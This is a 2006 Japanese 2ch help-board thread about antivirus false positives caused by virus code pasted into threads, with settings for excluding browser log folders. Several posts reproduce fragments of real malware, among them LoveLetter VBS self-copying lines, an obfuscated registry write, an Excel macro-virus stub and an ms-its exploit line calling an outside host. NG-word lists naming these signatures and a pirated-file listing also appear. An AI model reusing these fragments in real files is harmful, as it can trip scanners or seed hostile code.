導入しているマカフィーでスキャンかけても何の反応もなかったんですが、
ノートンのオンラインスキャンやってみると
感染ファイルが二個みつかって
C:\Program Files\gikoNavi\Log\2ch\aasaloon\Folder.idx は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\subject.txt は Bloodhound.Exploit.6 に感染しています。
と言う表示が出ました。
これは危険なんでしょうか。それともただのウィルスコード?

601:ひよこ名無しさん
06/06/22 20:27:57 .net
>>593
ただのウィルスコード
これで消せる。
URLリンク(www.geocities.jp)

602:ひよこ名無しさん
06/06/22 20:28:13 .net
>>593
ノートンがvbsウィルスのソースに誤反応3
スレリンク(pcqa板)

603:ひよこ名無しさん
06/06/22 20:28:47 .net
>>594
cen乙

604:ひよこ名無しさん
06/06/22 20:30:04 .net
>>594-596
レス早いなw

605:ひよこ名無しさん
06/06/22 20:41:25 .net
粘着してリロードしながら監視してるんだろ?www

606:ひよこ名無しさん
06/06/22 20:44:02 l9A+tZtH.net
>>594
ありがとうございます。
見分けるコツみたいなものはあるんですか?

607:ひよこ名無しさん
06/06/22 22:08:53 .net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

608:ひよこ名無しさん
06/06/23 00:17:41 .net
ノートンがvbsウィルスのソースに誤反応3
スレリンク(pcqa板)

テンプレにでも入れるか・・・?
脳豚使うなら自力で何とかしろよ・・・

609:ひよこ名無しさん
06/06/23 00:18:16 .net
誤爆

610:ひよこ名無しさん
06/06/23 18:23:08 .net
___ゲームキャラ板でもモニカワイイモニカ様___
スレリンク(gamechara板)

このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
NGコードとかどう打って対処すればいいのですか?

611:ひよこ名無しさん
06/06/23 18:23:47 6hQn7KgH.net
使用2chブラウザは Jane Doe Styleです。

612:ひよこ名無しさん
06/06/23 18:25:27 .net
>>604
回答めんどいからこのスレ内検索して

613:ひよこ名無しさん
06/06/23 22:47:16 .net
>>599
専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。

614:ひよこ名無しさん
06/06/28 16:58:31 .net
age

615:ひよこ名無しさん
06/06/29 15:09:12 C6iUe2mV.net
Your attention,Please. みなさまに申し上げます
fire drill 火災避難訓練

616:ひよこ名無しさん
06/06/29 19:41:48 .net
age

617:ひよこ名無しさん
06/06/29 21:38:29 .net
スレリンク(pcqa板:111-番)

111 名前:ひよこ名無しさん 投稿日:2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★ にならなくて○◆になってしまうんですが、どうしてでしょうか


113 名前:愛新覚羅 ◆WjkbiI..A2 投稿日:2006/06/29(木) 21:34:04 ID:???
>>111
ウイルシかな

618:ひよこ名無しさん
06/06/30 22:56:15 2Lq/lYYu.net
テスト

619:ひよこ名無しさん
06/07/01 00:07:11 Dt6nkhA2.net
スレリンク(arc板:16番)

コレって書き込んだ本人がウイルスに感染しているって事でしょうか?

620:ひよこ名無しさん
06/07/01 00:08:55 .net
>>612
ノートン先生を誤反応させるためにわざと貼ってるんだよ

621:612
06/07/01 00:39:41 Dt6nkhA2.net
ただ、これ書いた人がカードゲームのトレードスレに
自分のメルアド出してブログバレしてます

622:ひよこ名無しさん
06/07/01 23:18:07 .net
複雑な自爆では?

623:ひよこ名無しさん
06/07/02 19:36:03 ytfN9V0/.net
ノートン2006でAutoprotectの設定で、ログのフォルダを除外したいのですが、
それらしい項目が分かりません。
Norton AntiVirusオプションの項目ではないのでしょうか?

624:ひよこ名無しさん
06/07/02 20:00:00 ytfN9V0/.net
事故解決しました。

625:ひよこ名無しさん
06/07/03 19:55:32 pfnK+d5L.net
専ブラ(Jane)での書き込みの妨害も先生の仕業?
更新かけて解決するのであれば(期限切れ)、
してやらんでもないのだが・・・。


626:ひよこ名無しさん
06/07/03 22:30:42 .net
>>618
> 更新かけて解決するのであれば(期限切れ)、

それはないな。FW(が入っているのであれば)一時的に切ってみるしか

627:618
06/07/03 23:15:21 pfnK+d5L.net
>>619
いや、プラウザからなら書き込めるんですよ。
ノートン有効→一部の板の閲覧不可(IE、専ブラ共に)
    無効→共に閲覧は可能 専ブラでの書き込みが不可。
ってわけでこの板だけは、IEからしか書き込めないんです・・・。
まぁ、通信を許可すれば解決なんでしょうが・・・。
いろいろやってみます。 どもでした。


628:ひよこ名無しさん
06/07/04 02:40:17 .net
まったくの初心者ですが
ノートンインターネットセキュリティー2006での誤反応対策を教えてください
既出でしたらアンカーでもいいのでお願いします

629:ひよこ名無しさん
06/07/04 08:28:52 .net
>>621
>>1->>620を読め

630:ひよこ名無しさん
06/07/04 10:11:31 .net
「まったくの初心者」

だからどうした?このスレを100回読んで知識増やせ。

631:ひよこ名無しさん
06/07/04 20:16:10 Bwi55Fwo.net
スレを開いたら突然ウィルスに感染したんですがurlを直接踏まなくても
感染するウィルスはあるんですか?

632:ひよこ名無しさん
06/07/05 11:14:56 .net
>>624
>>1->>620を読め

633:ひよこ名無しさん
06/07/05 17:10:28 xPsQC9iJ.net
       , --- 、_
      /ミミミヾヾヽ、_
   ∠ヾヾヾヾヾヾjj┴彡ニヽ
  / , -ー‐'"´´´    ヾ.三ヽ
  ,' /            ヾ三ヽ
  j |             / }ミ i
  | |              / /ミ  !
  } | r、          l ゙iミ __」 
  |]ムヽ、_    __∠二、__,ィ|/ ィ }
  |    ̄`ミl==r'´     / |lぅ lj   私が原田ウィルス作者ですが何か?
  「!ヽ、_×___j ヽ、×  -'  レ'r'/  
   `!     j  ヽ        j_ノ   
   ',    ヽァ_ '┘     ,i    
    ヽ  ___'...__   i   ハ__      
     ヽ ゙二二 `  ,'


634:// 八       ヽ        /'´   / ヽ       |ヽ、__, '´ /   /   \



635:ひよこ名無しさん
06/07/07 03:17:23 .net
>>577
遅レスだけど一応。
URLリンク(mickey.mirv.net)
↑みて最新のアドレス設定しる

636:ひよこ名無しさん
06/07/15 01:31:41 668g3rrq.net
こんなPCはネットにつなぐな! 3日間放置した無防備PCの結末は?
URLリンク(arena.nikkeibp.co.jp)

以下すべて日本語対応で無料。

ブラウザ:Firefox URLリンク(www.mozilla-japan.org)
メーラー:Thunderbird URLリンク(www.mozilla-japan.org)
 上記2種の拡張(URLリンク(beau.g-com.ne.jp)
スパイウェア対策:URLリンク(www.geocities.jp)
ウィルス対策:avast! URLリンク(www.forest.impress.co.jp)
適当なルーター:BUFFALO BBR-4HG URLリンク(netspeed.studio-radish.com)

無料のウイルス対策ソフトなどのセキュリティソフト一覧
URLリンク(www.geocities.co.jp)
セキュリティ板
URLリンク(pc8.2ch.net)

637:ひよこ名無しさん
06/07/23 19:35:23 XNQAeCHC.net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))  

638:ひよこ名無しさん
06/07/24 00:49:37 .net
できれば既出のものじゃなくて
新しいの一行づつ張ってほしいなぁ。

639:ひよこ名無しさん
06/07/29 23:32:33 .net
2CH自体、5月からはじめました。
ノートンがなんだかよくわかりませんが、ある掲示板で症状を書き込んだところ
ノートン先生かといわれました。

症状としては、かんじなどを変換すると候補がでますが、するとその時点でIEが
強制終了してしまいます。
2CHはIEでみています。最初から。
これ、直るのでしょうか?

パソコン使えないとネットで就職活動もできず困っています。
どうかよろしくお願いします。


640:ひよこ名無しさん
06/07/29 23:59:23 .net
このスレとは関係ないような・・・

641:ひよこ名無しさん
06/07/30 00:06:37 .net
>>631
ですけど、感染したときにLOVE-LETTERなんとかというものが画面に表示されました。
そのときなんだかわからなかったので、続行のボタンを押しました。
漢字を変換するとIEが落ちてしまうので、最初に出てきた感じで該当するものが泣ければ
そのままにしています。
なんとかならないでしょうか。


642:ひよこ名無しさん
06/07/30 00:40:34 .net
ここはウイルス対策ソフトの「誤反応」のスレです。
ウイルスにほんとに感染してる件ならスレ違い

643:ひよこ名無しさん
06/07/30 03:56:39 .net
>>633
よく分からないならクリーンインストールしろ。
それも出来ないなら就職浪人決定。

644:ひよこ名無しさん
06/07/30 19:55:34 .net
クリーンインストールってなに?

645:ひよこ名無しさん
06/07/30 20:12:01 .net
おまえの頭を入れ替えること

646:ひよこ名無しさん
06/07/31 00:58:59 .net
つまらん。0点。>>637

647:ひよこ名無しさん
06/07/31 01:59:16 .net
女王様の椅子取りゲーム

648:ひよこ名無しさん
06/08/03 17:37:02 oF+rx1Q5.net
>>636
ぐぐっておいてやった。参考にしる。

URLリンク(www.google.co.jp)
URLリンク(www.google.co.jp)
URLリンク(www.google.co.jp)
URLリンク(www.google.co.jp)

URLリンク(www.google.co.jp)

どれも似たような内容なので、好きなのを選べばいいべさ

649:ひよこ名無しさん
06/08/10 13:48:08 .net
ウイルスコードの誤反応ではありませんが、
ノートンを切らないとPCQA板に入れなくなってしまいました。(進入検知が誤反応)
この場合はどうすればいいでしょうか?

650:ひよこ名無しさん
06/08/10 15:08:46 .net
>>641
ノートンを切ればいいと思います。

651:ひよこ名無しさん
06/08/10 16:07:02 .net
>>641
2chを見ようとすると「侵入を検出して遮断しました。」というダイアログが表示されて
2chを見れなくなってしまう問題のまとめページ。
URLリンク(mickey.mirv.net)
ノートン誤作動対策本部
URLリンク(qb5.2ch.net)

652:ひよこ名無しさん
06/08/10 18:08:02 .net
<<642<<643㌧

653:ひよこ名無しさん
06/08/12 15:29:22 .net
質問お願いします。
ノートン側のオプションから除外指定するとき、
*.dbx
*.nch
というのが除外の欄に書いてあったのですが、これは最初からそうなのでしょうか?
例えばノートン自体が攻撃されて書き換えられる可能性とかありますか?

654:ひよこ名無しさん
06/08/12 17:20:14 .net
>>645
デフォルトでそうなってるから心配すんな

655:645
06/08/13 06:13:39 .net
>>646
ありがとございます。

656:ひよこ名無しさん
06/08/14 01:05:42 .net
マカフィーでもコード貼られたログファイル消されて見れないんだけどどうすればいい?

657:ひよこ名無しさん
06/08/15 01:23:16 .net
>>648
>>17
スレリンク(sec板:28-29番)n
スレリンク(sec板:298-305番)n

658:ひよこ名無しさん
06/08/16 18:54:56 .net
でも、ノートン自体は反応しても実際にウイルスではないんですよね?


659:ひよこ名無しさん
06/08/16 22:35:50 .net
だからスレタイにも誤反応って書いてあるだろ

660:ひよこ名無しさん
06/08/17 02:53:34 .net
確認しただけだろ。
頭固てえな。

661:ひよこ名無しさん
06/08/20 16:12:51 .net
>643
この対応ってNISだけですよね。
自分ノートンアンチウイルスの方なんだが、やっぱ誤作動する。
これはどう解除すればいいんだ?

662:ひよこ名無しさん
06/08/20 21:24:08 .net
>>653
>>643末尾に挙げられている過去ログでレス番727あたりから読んでみるといいかも

663:ひよこ名無しさん
06/08/22 03:27:14 NKrNf7Jc.net
URLリンク(mickey.mirv.net)を見て
>タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」

をやってみたのですが左クリックをしても何も出てきません。
右クリックなら「Norton Anti Virusを開く」「Auto Protectを無効にする」
「Norton Antiオプション」の三つのメニューが出るんですが、
どうすればNorton Internet Securityを開くことができるんでしょうか。

664:ひよこ名無しさん
06/08/22 06:49:12 .net
>>655
もしかしてNAVしかインストールしてないとか?
URLリンク(mickey.mirv.net) には説明ないけど
NAVでも誤反応する。>>654参照

665:ひよこ名無しさん
06/08/24 21:19:27 .net
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
URLリンク(ansitu.xrea.jp)

■2ch NIS問題まとめページ
URLリンク(mickey.mirv.net)

■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
URLリンク(service1.symantec.com)

・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」などの
単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。

・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)

■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
URLリンク(info.2ch.net)


666:ひよこ名無しさん
06/08/29 22:27:40 .net
727 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2006/03/26(日) 16:24:59 ID:pwaEyKGo0

>>726
参考までに・・・ただし、自己責任で

ノートンアンチウイルス2006 Ver.1
スレリンク(sec板:996番)

> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、

> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。

> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、

> 遮断解除してok。で、ok。

667:ひよこ名無しさん
06/09/01 17:54:57 O8GwKufV.net
てす

668:ひよこ名無しさん
06/09/01 19:19:06 .net


669:ひよこ名無しさん
06/09/05 22:30:31 .net
#include <mmlite.h>
#include <stdlib.h>
#include <tchar.h>
UINT __cdecl _ttoh(const _TCHAR *String)
{
UINT Value = 0, Digit;
_TCHAR c;
while ((c = *String++) != _EOS) {
if (c >= '0' && c <= '9') Digit = (UINT) (c - '0');
else if (c >= 'a' && c <= 'f') Digit = (UINT) (c - 'a') + 10;
else if (c >= 'A' && c <= 'F') Digit = (UINT) (c - 'A') + 10;
else break;
Value = (Value << 4) + Digit;
}
return Value;
}


670:ひよこ名無しさん
06/09/10 21:32:48 .net

>>1

>>2chブラウザのログ保存フォルダを「除外」に設定。

これがどういうことかもうすこし詳しく説明してください。

2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
除外に認定とは、何の除外に認定すればいいのでしょうか。

これだけでは全く意味がわかりません。


671:<body onload=window()>
06/09/10 22:26:11 .net
[ 自主制作映画 ] [ ジャッカル ] 第 0012 話 ジャッカルがあるさ ( Rev 0001 ) ( 低画質 Ver ).avi 7,177,218 07818b50961750fbaef7124384ac2e70
[ 自主制作映画 ] [ ジャッカル ] 第 0037 話 クッキング・オブ・ジャッカル II ( Rev 0004 ) ( 低画質 Ver ).avi 9,789,864 22b1bd0222641a2ca3cdeb2176170e1b
!(映画アニメ) ドラえもん のび太と雲の王国.avi 361,081,856 65f122004a3545aac6ae276a9765bb3c
## ひぐらしのなく頃に - 暇潰し編 - 其の壱 「ヒナミザワ」.avi 147,861,504 d85b4c07df470706aae626d5c8579571
##(ドラマ)恋の時間 第07話[704×396 DivX6.xxHe-3].avi 378,019,316 53f9c9cba3b31e05d934d3e2bb0b8f3d
#289 ダウンタウンのガキの使いやあらへんで 第289回 [1995.09.03] 今日我々は豚を食べる!!+トーク.avi 143,990,332 7616f03362cb813a456f5844a5bdb956
#DMS Night24.com アナルセックス サンドイッチ あや.avi 724,464,291 751e423a7fd2f543cbb3e624048051e0

672:ひよこ名無しさん
06/09/10 22:30:08 .net
>>662
> 2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
使っている2ch専用ブラウザによって違います。
専用ブラウザを使っていない人には関係ありません。

> 除外に認定とは、何の除外に認定すればいいのでしょうか。
ウイルス対策ソフトの検知対象から除外するように設定します。
やり方はウイルス対策ソフトによって違います。
除外設定(「認定」ではなく「設定」)ができないウイルス対策ソフトもあります。

> これだけでは全く意味がわかりません。
以上の説明で全く意味がわからないなら、当面は気にする必要ありません。
実際にその現象に遭遇すれば自然とわかるようになるでしょう。

673:662
06/09/11 19:21:09 .net
>>664
               ミミ ヽヽヽヽリリノノノノ
              ミ   ,,、,、,、,、,、,、,、、 彡  
          r、r.r 、l   i''"         i彡
         r |_,|_,|_,||  」    /'  '\ |
         |_,|_,|_,|/⌒/    -・=-, 、-・=-│
         |_,|_,|_人そ(^i     ノ( 、_, )ヽ |  ・・・で?
         | )   ヽノ |.   ノ   !!   |
         |  `".`´  ノ     ノ ̄i   |
         人  入_ノ´    ヽニニノ  ノ\
       /  \_/\\         /|\\
             /   \ ト ──イ/   ヽヽ


674:ひよこ名無しさん
06/09/13 01:41:38 .net
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
URLリンク(ansitu.xrea.jp)

■2ch NIS問題まとめページ
URLリンク(mickey.mirv.net)

■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
URLリンク(service1.symantec.com)

・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「=w indow」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」
などの 単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。

・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)

■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
URLリンク(info.2ch.net)


675:ひよこ名無しさん
06/09/13 18:00:04 .net
Norton Anti Virus 2003です。

>専用ブラウザのログ保存フォルダを「除外」に設定。
オプション→Norton Anti Virus→除外→新規→項目→フォルダが開いているアイコン→フォルダの参照から2chブラウザのログ保存フォルダを選んでクリック→項目のOKをクリック。
>◆2004/2003はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をしてください。

手動で探しても、ウイルスソースが貼られたログは自動的に破棄されてしまっているので.datを選択することができません。idxだけ保存されていますが除外しても変わりなしです。
どうすれば見れるようになりますか?

676:ひよこ名無しさん
06/09/14 18:29:19 .net
>>667
自分が引用してる文章をよく読めばわかるだろうが
datやidxなどの「ファイル」を除外するのではない
「フォルダ」を正しく除外していればログが自動的に破棄されることはない

677:ひよこ名無しさん
06/09/14 20:59:51 .net
>>668
言われてやっと気付きました。ありがとうございます

678:ひよこ名無しさん
06/09/14 22:06:23 .net
Norton Anti Virus 2004を使用しています。
手動スキャンとAuto-ProtectでLogフォルダの除外と
URLリンク(mickey.mirv.net) ←の対処はしてありますが、
たまーに一部のウイルスソースに引っかかってしまいます。
そうなると、しばらくインターネットセキュリティを無効ししないとならなくなります。
例えば最近だと、下記のウイルスソースです。

両方なのか、片方なのか分かりませんがウイルス警告がでます。
対処方法はありますか?

679:670
06/09/14 22:06:56 .net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

680:670
06/09/14 22:07:27 .net
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0


681:670
06/09/14 22:08:40 .net
といった感じのものです。
671か672かは分かりませんがノートンが反応してしまいます。

682:670
06/09/14 22:20:18 .net
今やってみたのですが671と672ではノートンは反応しませんでした。
すいません、他のやつだったのかな?

683:ひよこ名無しさん
06/09/14 23:24:15 .net
>>673-674
貼るな
他人の迷惑も考えろ。


684:<body onload=window()>
06/09/14 23:57:48 .net
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0



685:670
06/09/15 09:02:47 .net
>>675
スマン

>>676だと何にも反応しないんだよな
反応するときはなんなのかな?

686:ひよこ名無しさん
06/09/15 12:41:38 .net
>>677
下から二行目

687:ひよこ名無しさん
06/09/16 04:32:07 uZM1h+BC.net
Norton Anti Virus2003でWinXP/IE6。Live2chです。
ノートン入れたら~のWikiを見て、
Norton AntiVirusのオプション→システム>Auto-Protect>除外→C:\Program Files\Live2ch\logフォルダを追加。
手動スキャンにも同じようにログを除外しました。
ですが専ブラを再起動させてみてもログを取得し直して見ても、このスレや他にウイルスが貼られているスレでもウイルス警告が出てきます。
間違っていないと思うのですがどうしてでしょうか…。教えてください。

688:ひよこ名無しさん
06/09/16 05:02:15 .net
>>679
>>643 辺りの件は対策しましたか?
NAVでも誤反応します。

689:679
06/09/16 05:06:27 .net
すみません解決です
除外指定するのはlog保存フォルダじゃなくインストールフォルダ自体のことだったんですね

>>680
ありがとうございます
参考になりました

690:ひよこ名無しさん
06/09/17 06:36:54 .net
携帯厨よけの誤反応作ってくれ
スレが携帯からのガキだらけで機能しなくなっちまった

691:ひよこ名無しさん
06/09/26 11:45:24 .net
2007では対応したの?

692:ひよこ名無しさん
06/09/30 14:45:45 .net
test

693:ひよこ名無しさん
06/10/01 12:02:45 .net
>658タソのをしても反応するし2ちゃんねるのIPアドレスを除外
しても設定しても反応するし>17タソのプログラムは問題があるとかで
途中で動かなくなるしでハラ立ってきたんで
ワーム防止を黙らせたった(ノ`□´)ノ≡≡≡≡≡≡≡≡┻━┻

694:ひよこ名無しさん
06/10/02 08:02:14 q3VL2ORv.net
管理者がサクージョ&規制すればいい。
専ブラ使ってる漏れとしては迷惑。

695:ひよこ名無しさん
06/10/04 04:23:42 .net
>>686
誤反応するような不便なソフトは
淘汰されて滅びたほうがいい、という考え方らすい

696:ひよこ名無しさん
06/10/04 06:54:44 .net
test

697:cen ◆Am9xOgNMYE
06/10/05 00:10:23 .net
>>17のソフトですが、バージョンが2.00になりました。
URLリンク(www.geocities.jp)

>>685
どういう状況か教えてもらえますか?

698:ひよこ名無しさん
06/10/05 15:00:29 Qin047IX.net
ノートン使えねえから今日からバスターにしましたぁ

699:ひよこ名無しさん
06/10/05 16:59:52 .net
>>689
GUIになったのはいいけど.NET Frameworkが必要なければもっとよかったなぁ。
PCがしょぼいからできるだけ余計なものは入れたくないんだよね。
ウチでは古いバージョンの方を使わせてもらうことにします。

700:cen ◆Am9xOgNMYE
06/10/06 01:17:30 .net
>>691
使っていただいてあり�


701:ェとうです。 .NET Frameworkを使わない前のバージョンの方が起動 が早いですね。 まあ、Visual C#で割と楽にGUIが作れるいうのが理由です^^;



702:キーワード
06/10/06 02:48:50 .net
<body onload=window()>
eip = eip + unescape("%u7030%u4300")
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
dirsystem&"\MSKernel32.vbs
ms-its:mhtml:file://C:
its:mhtml:file://c:\
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines
kak.hta';ken=wd+'ST
Set A4 = A1.CreateTextFile(A1.BuildPath
ToInfect.CodeModule.InsertLines BGN

703:ひよこ名無しさん
06/10/06 03:37:15 .net
>>693 キーワード NGワード

704:ひよこ名無しさん
06/10/06 18:12:11 .net
ウィルスコードの適当な文字をNGワードに設定しとくとかじゃダメなの?
スレッドをダウンロードするからNGワードとか無意味?

705:ひよこ名無しさん
06/10/06 20:46:48 .net
大空寺系には反応しなくなったけど、
OnLoad Rte CodeExec
なんとかならんかなぁ

706:ひよこ名無しさん
06/10/07 12:12:01 .net
あほ

707:ひよこ名無しさん
06/10/07 23:00:36 .net
ほす

708:ひよこ名無しさん
06/10/08 00:17:50 .net
いい加減ウザくなったしどうせ更新時期だったからノートン先生からバスターに切り換えてみた。
確かに反応はしなくなったけど、何らかの不都合ってあるのかな。

709:ひよこ名無しさん
06/10/08 01:30:54 .net
どなたかマカフィ誤作動の解除方法教えてください。

710:ひよこ名無しさん
06/10/12 00:38:44 .net
ノートン先生がもうすぐ更新なんですが、
なんか、うっとうしいから今度は別のメーカーにしたいのですが・・・お勧め教えてください。

ちなみに、なぜか、Cドライブの空きは8%ぐらいしかない
とんでもないPCです。


711:経営学部の学生 ◆2H3Xipoq6Y
06/10/12 04:12:22 .net
個人的にはジャストシステムから11月に発売のカスペルスキー6かな?
いまライフボートから出てるカスペルスキー5を買っても6が出たらアップデートできるみたいだし

712:ひよこ名無しさん
06/10/13 04:39:42 .net
Norton Anti Virus2006を使っています。
>>658の操作中、「現在、AutoBlockで遮断しているコンピュータ」
のところに何もアドレス等が載ってないのですが
どうすればこの先誤反応解除の操作を進められるんでしょうか。

713:ひよこ名無しさん
06/10/13 09:16:01 .net
>>703
専用ブラウザのフォルダごと全て除外にしたら俺は止まったよ
同じNorton Anti Virus2006だけど

714:ひよこ名無しさん
06/10/13 09:28:32 .net
>>703
なにも載ってないってことは
丁度そのときに遮断されてないのだから解除する必要はない。
前半の設定ができていれば問題ないのでは?

>>704
その設定で止まるやつと
インターネットワームの誤反応とは別物だよ。


715:ひよこ名無しさん
06/10/13 12:10:09 yCzxUbTg.net
ノートンがVBS.Freelink.Bというウイルスに反応したのですが、
ウイルス警告のウインドウが消しても消しても出てきます。
どうすればいいのでしょうか?



716:ひよこ名無しさん
06/10/13 15:07:54 cPKv8TOO.net
NIS2006
winSP sp2

2chスレ読み込んだら「コンピュータを攻撃するうんぬん」ってメッセージが出てその板が一定期間
アクセス不可になる現象。回避策ある?

717:ひよこ名無しさん
06/10/13 15:15:38 .net
ちなみにURLリンク(mickey.mirv.net)にはNIS2006の対象砲は書いてない、、><

718:ひよこ名無しさん
06/10/13 17:48:31 .net
ane doe style2.41 WinXPsp2使用
Norton Internet Security2004 Norton AntiVirus2004使用

Jane doe style2.41のログを除外しているのですが
ウイルスコードが貼られてる板を開くと
「エラー」と表示され、ログを取得できません
それで、いつもNorton Internet Security2004を無効にして
その板を開くと、思ったとおりウイルスコードが張られています

この状態になると、何分間か、その板を開く事が出来なくなります
ログの除外をしているのに、なぜこうなるのでしょうか?

719:ひよこ名無しさん
06/10/13 19:22:08 .net
>>709
設定を間違ってる

720:ひよこ名無しさん
06/10/13 19:57:21 .net
>>710
C\Program Files\Jane Style\Logs\2ch

なんですが、間違ってるのでしょうか?

721:ひよこ名無しさん
06/10/13 21:08:55 .net
経営学部の学生さん>>701です。

ありがとうございました。
11月まではノートン先生が頑張ってくれそうなので、
その後の購入の参考にします。

722:ひよこ名無しさん
06/10/13 23:09:01 .net
>>709
一定時間板が開けなくなる件の誤反応はログフォルダ除外では対応できません。

2chを見ようとすると「侵入を検出して遮断しました。」というダイアログが表示されて
2chを見れなくなってしまう問題のまとめページ。
URLリンク(mickey.mirv.net)

NAVの人は下記スレの698辺りから参照

